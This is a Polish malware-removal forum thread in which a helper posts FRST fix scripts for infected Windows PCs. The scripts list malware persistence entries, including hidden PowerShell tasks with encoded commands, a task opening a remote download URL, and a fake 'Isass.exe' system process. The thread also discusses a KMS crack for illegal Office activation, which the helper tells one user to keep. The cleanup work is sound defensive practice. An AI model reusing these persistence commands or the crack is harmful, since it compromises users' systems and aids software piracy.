picasso

To program ukryty i nie widać go na liście z poziomu użytkownika. Po pierwszej próbie usuwania przy udziale narzędzia Microsoftu nadal log Addition pokazywał ten program, więc pytaniem jest czy rzeczywiście ponowiłeś próbę po raz drugi. Czy ten efekt zniknął po użyciu AdwCleaner? AdwCleaner usuwał masowo skojarzenia plików powiązane z chińczykami. Zaleciłam reinstalację Chrome, więc na wszelki wypadek zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut.

Tym razem udało się zbić aktywne elementy, ostało się jedno zadanie w Harmonogramie. Idziemy dalej: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: Task: {D3717DFB-1B28-4BA6-975D-0D8B7594BAA5} - System32\Tasks\psv_VentoLotstock => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\NamSolotough.reg" & del "C:\ProgramData\AppriabuS\NamSolotough.reg" & SCHTASKS /Delete /TN "psv_VentoLotstock" /F DeleteQuarantine: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt. 2. Ponów próbę usuwania Online Application w Program Install and Uninstall Troubleshooter. 3. Przeinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki, by usunąć katalog profilu. 4. Uruchom AdwCleaner. Wybierz opcje Skanuj + Oczyść i dostarcz log wynikowy z folderu C:\AdwCleaner.

Wszystko co zadałam usunięte, ale po prostu w międzyczasie doładowały się nowe elementy. Będzie tu kilka etapów czyszczenia, na razie miotamy z ubiciem aktywnych elementów. Kolejna porcja działań: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: R2 AppriabuS; C:\ProgramData\\AppriabuS\\AppriabuS.exe [3137536 2017-06-13] (TODO: ) [brak podpisu cyfrowego] R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2016-08-26] (Popcorn Time) [brak podpisu cyfrowego] Task: {272329ED-57C8-4DCD-B381-F1545C96B284} - System32\Tasks\psv_Gravelam => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Free-Dox.reg" & del "C:\ProgramData\AppriabuS\Free-Dox.reg" & SCHTASKS /Delete /TN "psv_Gravelam" /F Task: {45AE2A38-DA0C-4818-A515-F4164751F0EA} - System32\Tasks\psv_Softlex => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\HoldFresh.reg" & del "C:\ProgramData\AppriabuS\HoldFresh.reg" & SCHTASKS /Delete /TN "psv_Softlex" /F Task: {480AC5AC-7410-4CEF-858C-149819C78172} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () Task: {4C70AA96-CBFE-4C85-BD09-DD13AA05230B} - System32\Tasks\psv_Ontoin => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Treeis.reg" & del "C:\ProgramData\AppriabuS\Treeis.reg" & SCHTASKS /Delete /TN "psv_Ontoin" /F Task: {4F3F91C2-4B97-4982-B2E2-BF56C1E73A68} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) Task: {4FECAAB3-D2DE-4A3F-B30D-3D2D48935C66} - System32\Tasks\E3605470-291B-44EB-8648-745EE356599A2 => Rundll32.exe "C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll",#1 Task: {5326893D-65F6-41B5-987F-64944B92404F} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-12-26] () Task: {67163D51-2C87-4F0D-A642-D96375997C94} - \snp -> Brak pliku Task: {67CBC653-A1EA-484C-9208-7A3E3475F9A2} - System32\Tasks\{7A0F0D47-0F0B-0B0E-7D11-787E0C0F1108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAIAAgACAAOwAgACAAIAA7ACAAOwA7ADsAIAA7ADsAIAAgADsAOwA7ACAAOwAgACAAOwA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUA (dane wartości zawierają 10072 znaków więcej). Task: {70E8C2AC-CE19-4CB7-A64D-60E966D41D32} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) Task: {7CBB39E2-31D5-4780-9B99-9292C66AE4F0} - System32\Tasks\psv_Tamp-Zap => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Inchfind.reg" & del "C:\ProgramData\AppriabuS\Inchfind.reg" & SCHTASKS /Delete /TN "psv_Tamp-Zap" /F Task: {987E8443-F673-4E9A-B5F6-2C477B4A50C9} - \snf -> Brak pliku Task: {9ABAB7AC-8C1F-4899-B9B4-240D0DE78826} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) Task: {AD456F62-9032-4D67-982B-EFF665609522} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () Task: {B1FB20EF-B3E2-4B18-BCD5-592E4A03FD4F} - System32\Tasks\psv_Saotouch => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Lamstring.reg" & del "C:\ProgramData\AppriabuS\Lamstring.reg" & SCHTASKS /Delete /TN "psv_Saotouch" /F Task: {C1956C73-47CE-42E1-8EB4-98B2C98C8D5A} - System32\Tasks\E3605470-291B-44EB-8648-745EE356599A => Rundll32.exe "C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll",#1 Task: {C7F32682-3F97-4A7F-AFDC-970F3CC0903A} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () Task: {E100684C-27BA-4968-8EAE-44FB71BA8BBD} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) Task: {EE00D26D-C1D9-4972-8B97-C6776D4F7005} - System32\Tasks\psv_LabToron => cmd.exe /c regedit.exe /s "C:\ProgramData\AppriabuS\Vilabam.reg" & del "C:\ProgramData\AppriabuS\Vilabam.reg" & SCHTASKS /Delete /TN "psv_LabToron" /F Task: C:\Windows\Tasks\E3605470-291B-44EB-8648-745EE356599A.job => C:\Program Files (x86)\YtubeABlckU\ErT7J6V.dll Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe Task: C:\Windows\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe Task: C:\Windows\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [HGYgCzpF0RDaX.exe] => C:\ProgramData\9cac9a3bc4a2401abefa9a51a0ff456e\HGYgCzpF0RDaX.exe [126976 2017-06-13] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [kirlSC3gvg.exe] => C:\Users\ABBA\AppData\Roaming\67b8914af1d4424090aa08cd7787f6af\kirlSC3gvg.exe [126976 2017-06-13] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\RunOnce: [oWYEY123a.exe] => C:\Users\ABBA\AppData\Roaming\eda59158d6c44145985275c646b4a687\oWYEY123a.exe [686592 2017-06-13] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\RunOnce: [wYfUrfeiSFsd.exe] => C:\ProgramData\636ae1df1e164e92b276ed99b5e4afcc\wYfUrfeiSFsd.exe [686592 2017-06-13] () AppInit_DLLs: C:\ProgramData\AppriabuS\U-Ronfax.dll => C:\ProgramData\AppriabuS\U-Ronfax.dll [343552 2017-06-13] () AppInit_DLLs-x32: C:\ProgramData\AppriabuS\Mathozesing.dll => C:\ProgramData\AppriabuS\Mathozesing.dll [246784 2017-06-13] () BHO: YoutubeAdBlock -> {E3605470-291B-44EB-8648-745EE356599A} -> C:\Program Files (x86)\YtubeABlckIE\t3JQN5cq.dll [2017-06-13] () BHO-x32: YoutubeAdBlock -> {E3605470-291B-44EB-8648-745EE356599A} -> C:\Program Files (x86)\YtubeABlckIE\ku2wY4T.dll [2017-06-13] () DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\E3605470-291B-44EB-8648-745EE356599A DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Search module DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SystemHealer DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YeaDesktop C:\Program Files (x86)\Microleaves C:\Program Files (x86)\Popcorn Time C:\Program Files (x86)\SystemHealer C:\Program Files (x86)\YtubeABlckUn C:\Program Files (x86)\YtubeABlckU C:\Program Files (x86)\YtubeABlckIE C:\ProgramData\636ae1df1e164e92b276ed99b5e4afcc C:\ProgramData\9cac9a3bc4a2401abefa9a51a0ff456e C:\ProgramData\AppriabuS C:\ProgramData\AppriabuSs C:\ProgramData\Microleaves C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer C:\Users\ABBA\AppData\Local\AdvinstAnalytics C:\Users\ABBA\AppData\Local\PopcornTime C:\Users\ABBA\AppData\LocalLow\TubeAlckSet C:\Users\ABBA\AppData\Roaming\eda59158d6c44145985275c646b4a687 C:\Users\ABBA\AppData\Roaming\67b8914af1d4424090aa08cd7787f6af C:\Users\ABBA\AppData\Roaming\Microleaves C:\Users\ABBA\AppData\Roaming\System Healer C:\Users\ABBA\Downloads\PopcornTime C:\Users\Public\Desktop\Launch System Healer.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Nowy profil Chrome już został zainfekowany adware, więc powtórz operację z tworzeniem nowego profilu. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Format wydaje mi się zbyt mocną formą w stosunku do wagi problemów i pociągnęłabym temat dalej. Dla świętego spokoju, pozostaw ten aktywator. By skrypt FRST go nie naruszył, usuń ze skryptu FRST te dwie linie: IFEO\OSPPSVC.EXE: [Debugger] KMS-R@1nHook.exe IFEO\SppSvc.exe: [Debugger] KMS-R@1nHook.exe Reszta operacji nadal aktualna.

Agrax Pomiń punkt 2, za to po ukończeniu zadań wykonaj sprawdzanie plików via sfc /scannow i dostarcz log z wynikami: KLIK. Powodem tej dodatkowej akcji jest conajmniej jeden uszkodzony plik Windows widoczny w raporcie FRST: Niektóre zerobajtowe pliki/foldery: ========================== C:\Windows\System32\WindowsCodecsExt.dll Ten crack został użyty do nielegalnej aktywacji Microsoft Office co widać w Harmonogramie zadań: Task: {274748FD-3011-41BB-9083-5E850C1EE3C5} - System32\Tasks\R@1n-KMS\Office16ProPlus => wmic [Argument = path OfficeSoftwareProtectionProduct where (ID="d450596f-894d-49e0-966a-fd39ed4c4c64") call Activate] Dodatkowo są ślady innych matact, tzn. modyfikacja w pliku Hosts blokująca serwer walidacji Microsoftu. Tak więc jeśli crack ma być usunięty, należy użyć instrukcje którymi posługiwałeś się aktywując Office, tylko "odwrotnie". Wykonanie skryptu FRST naruszy dwa wpisy cracka (ale w sumie jest ich 4). Niespójność ikon tego samego typu to zwykle problem naruszonego cache ikon. Komenda EmptyTemp: w skrypcie FRST resetuje cache ikon, więc po użyciu skryptu FRST może nastąpić jakaś zmiana. O jakich komunikatach mowa i podczas uruchamiania jakich aplikacji? Miszel03 Dodałam do skryptu pominięte puste wpisy (Avast + Customer Experience Improvement Program w Harmonogramie oraz CyberGhost w msconfig) oraz wydruk zawartości pliku 1098902.cfg (by się upewnić co w nim jest). Problem prawdopodobnie leży w modyfikacji matrycy preferencji (wpisy FF ExtraCheck). Tak więc nie sądzę, by tu był potrzebny reset profilu Firefox, bo w zasadzie modyfikacji to jest tu właśnie mało. FF Extension: (Przelewy24Ext2.3) - C:\Users\Patryk\AppData\Roaming\Mozilla\Firefox\Profiles\k1pspd70.default-1488282384148\Extensions\jid1-AoXeeOB4j7kFdA@jetpack.xpi [2017-06-09] To poprawne rozszerzenie. Mój opis w bazie SystemLookup (prowadzę listę ID Firefoxa): KLIK.

Istotnie, ogromna ilość wpisów adware/PUP. Działania do przeprowadzenia: 1. Deinstalacje: ----> Przez Panel sterowania odinstaluj: 1.0.0.1, Popcorn Time, Search module. ----> Uruchom Program Install and Uninstall Troubleshooter i wskaż do usunięcia program Online Application. ----> Prawoklik na podane niżej pliki deinstalacyjne i "Uruchom jako administrator": C:\Program Files (x86)\Maoha\JiSuZip\Uninstall.exe C:\Program Files (x86)\mgdisk\uninst.exe W przypadku problemów z deinstalacją kontynuuj podane poniżej działania. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: S2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2017-06-12] () [brak podpisu cyfrowego] S2 JszipService; C:\Program Files (x86)\Maoha\JiSuZip\JszipSvc.exe [130072 2017-02-16] (深圳市猫哈网络科技发展有限公司) R2 MaohaWifiSvr; C:\Program Files (x86)\Maoha\MaohaAP\MaohaWifiSvr.exe [168992 2016-11-26] (深圳市猫哈网络科技发展有限公司) S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2017-04-25] () [brak podpisu cyfrowego] S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [2989056 2017-06-12] (Search Module Ltd.) [brak podpisu cyfrowego] R1 cryptfd; C:\Windows\System32\drivers\cryptfd.sys [195496 2017-05-25] () R1 MaohaWifiNetPro; C:\Program Files (x86)\Maoha\MaohaAP\MaoHaWiFiNet64.sys [1030496 2016-11-26] () S3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2017-06-12] () R1 WiserIso; C:\Windows\System32\Drivers\vcdrom.sys [25432 2016-12-27] () U4 ISODrive; \??\C:\Program Files (x86)\UltraISO\drivers\ISODrv64.sys [X] U1 ucdrv; \??\C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [X] U4 WinDivert1.2; \??\C:\Windows\system32\drivers\WinDivert64.sys [X] HKLM\...\RunOnce: [Lahin_Raw_barra_al3eb_b3id_29Z1FQJE] => C:\Program Files\Windows Defender\ERETNO3T2R477DXN6UMM5A\_WMDTrFYCO.exe [129536 2017-06-12] () HKLM\...\RunOnce: [Lahin_Raw_barra_al3eb_b3id_ZO84MD89] => C:\Program Files\FreeDownloadManager.ORG\MO904LU821\iqu9RYnG7W.exe [129536 2017-06-12] () HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [{50AB17EC-861D-4E3A-8A18-E6A1432F11A7}] => C:\Program Files (x86)\KMSPico\17364e4224244e99f9f910bba12790ff.exe [337920 2017-06-12] (InstallShield Software Corporation) HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [YjkhPack] => C:\Users\ABBA\AppData\Local\YjkhPack\7f5fa15c2802891dc341d97a85b5cf7c.exe [348186 2017-03-02] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [YeaDesktop] => C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe [3424256 2017-06-08] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [G6y#IQ-C+-.exe] => C:\Program Files\DVD Maker\1E3VTKPMH\G6y#IQ-C+-.exe [126976 2017-06-12] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [WxdzrolxDV0ATk.exe] => C:\Users\ABBA\AppData\Local\Temp\f0269ebd65774dfb9ad7c6a6410d36f9\WxdzrolxDV0ATk.exe [126976 2017-06-12] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [2z2f_i7xHP.exe] => C:\Program Files\ATI\CO9KEI\2z2f_i7xHP.exe [126976 2017-06-12] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [tARJSYiW.exe] => C:\Users\ABBA\AppData\Local\b5b7887505f4482ea91c41b0cefd6850\tARJSYiW.exe [126976 2017-06-12] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [Epktion] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\ABBA\AppData\Local\YjkhPack\zqgpudjd.dll HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [Local Security Authority Process] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Run: [Local Security Authority Processor] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\RunOnce: [kuT1yJV.exe] => C:\Users\ABBA\AppData\Local\Temp\1e7b51b164374d389849abe190dfa873\kuT1yJV.exe [686592 2017-06-12] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\RunOnce: [euZgGzAfJN.exe] => C:\Users\ABBA\AppData\Roaming\265459cc51d14714af05031c73ab5b09\euZgGzAfJN.exe [686592 2017-06-12] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\RunOnce: [uninstall.exe] => C:\Users\ABBA\AppData\Local\Temp\{e823f567efe34ab6b356a4b38ba77071}\W3MFWSkljm\uninstall.exe [686592 2017-06-12] () HKU\S-1-5-21-3347351025-225361290-299367054-1000\...\Policies\Explorer: [HideSCAHealth] 1 HKU\S-1-5-18\...\RunOnce: [WTK_IE_Google_Search] => REG ADD HKCU\Software\Microsoft\Internet Explorer\SearchScopes /v DefaultScope /t REG_SZ /d {637D6E3C-DF93-48A5-8362-159A8AC56B11} /f ShellExecuteHooks: Brak nazwy - {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - C:\ProgramData\igfxDH.dll [952832 2017-06-08] () ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => C:\Program Files (x86)\Maoha\JiSuZip\JZipExt.dll [2016-12-27] (深圳市猫哈网络科技发展有限公司) Startup: C:\Users\ABBA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk [2017-06-12] Task: {01BD4924-337A-4D7A-B699-97F4094BD298} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) Task: {07F64E7D-36D2-482C-A7D6-A2982E647BC1} - System32\Tasks\{EA82E898-AAA8-4A00-A38F-77EE0B676CD2} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Kayfresh\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\Kayfresh\uninstall.dat" -a uninstallme 857A73A6-8E8E-4C3A-BF32-012ED9C824F2 DeviceId=fa1989c8-c43d-24b0-6bd0-55635868f88e BarcodeId=51749003 ChannelId=3 DistributerName=APSFBcnmonetize Task: {1E209BD9-EFD9-41C9-AECB-863B15EF6928} - System32\Tasks\psv_Sanis => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Xxx-touch.reg" & del "C:\ProgramData\Subair\Xxx-touch.reg" & SCHTASKS /Delete /TN "psv_Sanis" /F Task: {2A4D2B20-BB7D-4C15-A51F-5B02738C7B7B} - System32\Tasks\snf => C:\ProgramData\Subair\Subair.exe Task: {4C0C64B3-A826-4A4C-961B-8F3BDE2538F7} - System32\Tasks\psv_Dentofind => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Y-fix.reg" & del "C:\ProgramData\Subair\Y-fix.reg" & SCHTASKS /Delete /TN "psv_Dentofind" /F Task: {5558F61F-974D-4918-8D24-4888769472E9} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) Task: {62F983A3-6815-4F12-9ED2-F0B9B96575D1} - System32\Tasks\Windows_Antimalware_Host => powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\u3bO8YL0WR.ps1 Task: {7777701D-38ED-4059-AF4E-94D53155549E} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) Task: {7D6EBDB7-8EA4-486B-9484-236102D69A89} - System32\Tasks\Windows_Antimalware_System_Host => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [2017-06-12] (® Microsoft Corporation. All rights reserved.) Task: {809009ED-4266-4CCB-B50D-084B2A86AD16} - System32\Tasks\PPI Update => C:\Windows\explorer.exe "hxxp://insightcdn.online/download/index.php?mn=9995" Task: {89DC34D6-1553-44D6-8E31-A65FF6954DEC} - System32\Tasks\psv_Subwarm => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Newredtax.reg" & del "C:\ProgramData\Subair\Newredtax.reg" & SCHTASKS /Delete /TN "psv_Subwarm" /F Task: {8B49EB79-F3BE-4D7D-80EF-6A1E753E9656} - System32\Tasks\Squarediarity in Board => Rundll32.exe "C:\Program Files\Squarediarity in Board\Squarediarity in Board.dll",vilFQvm Task: {91CB7E64-66B5-42B1-B7FC-C6564234457C} - System32\Tasks\psv_DonRonstring => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Lamwarm.reg" & del "C:\ProgramData\Subair\Lamwarm.reg" & SCHTASKS /Delete /TN "psv_DonRonstring" /F Task: {955906AE-6E9F-4E21-BE27-1F77DFC6E4D6} - System32\Tasks\psv_Trustair => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Indigostock.reg" & del "C:\ProgramData\Subair\Indigostock.reg" & SCHTASKS /Delete /TN "psv_Trustair" /F Task: {BC7A95B1-AE5E-454D-B328-718DA2D4B005} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) Task: {C7EC11C4-719C-4327-80F9-A9D2CC941D1B} - System32\Tasks\HD Ultra1 006-N => Rundll32.exe "C:\Program Files\HD Ultra1 006-N\HD Ultra1 006-N.dll",HJyhbqjdJGj Task: {D1CF3422-0CB3-4773-A6BC-443AC602D587} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-06-12] () Task: {FF739E73-E813-47C1-AA85-FDDE664B0F27} - System32\Tasks\SMW_UpdateTask_Time_3735323737343439372d3437415a556c2a3223346c41 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 Task: {FFC83BC8-972A-4CF8-B8A0-01B94F8104BF} - System32\Tasks\snp => C:\ProgramData\Subair\Subair.exe Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe WMI_ActiveScriptEventConsumer_ASEC: ShortcutWithArgument: C:\Users\ABBA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\ABBA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H6Czbcnbl1BU,d77c5cb9-67e6-48fd-af3c-cb12171382bc, ShortcutWithArgument: C:\Users\ABBA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\ABBA\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\ABBA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\ABBA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\ABBA\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\ABBA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\ABBA\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\ABBA\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/ HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-3347351025-225361290-299367054-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-3347351025-225361290-299367054-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY3AhIJvu_GKNPKRRne9KKYIBGMlAfvzVPEu6IRkWYfMYxQsK97PcGedNV09gltPBVnZOip-UfdmwQYAfJR-l7EOwl1Zo1v7D9Q23MuY1ttZl35_QYauy6XnstnH-DbXikzyVHYHuWNaRyknezIjNTmLRnNKjUitKGSXT1-QgI, HKU\S-1-5-21-3347351025-225361290-299367054-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY3AhIJvu_GKNPKRRne9KKYIBGMlAfvzVPEu6IRkWYfMYxQsK97PcGedNV09gltPBVnZOip-UfdmwQYDWgROQfmhWKeDV18UOaE2GMJ0uATOOAlABFVlvrUnZB_WQ0FbI9fNHrbLBdS081XVAYoj9FP5ZYEO-rr7B_VgTPoTGo,&q={searchTerms} SearchScopes: HKLM -> DefaultScope {637D6E3C-DF93-48A5-8362-159A8AC56B11} URL = SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY3AhIJvu_GKNPKRRne9KKYIBGMlAfvzVPEu6IRkWYfMYxQsK97PcGedNV09gltPBVnZOip-UfdmwQYDWgROQfmhWKeDV18UOaE2GMJ0uATOOAlABFVlvrUnZB_WQ0FbI9fNHrbLBdS081XVAYoj9FP5ZYEO-rr7B_VgTPoTGo,&q={searchTerms} SearchScopes: HKU\S-1-5-21-3347351025-225361290-299367054-1000 -> DefaultScope {ielnksrch} URL = 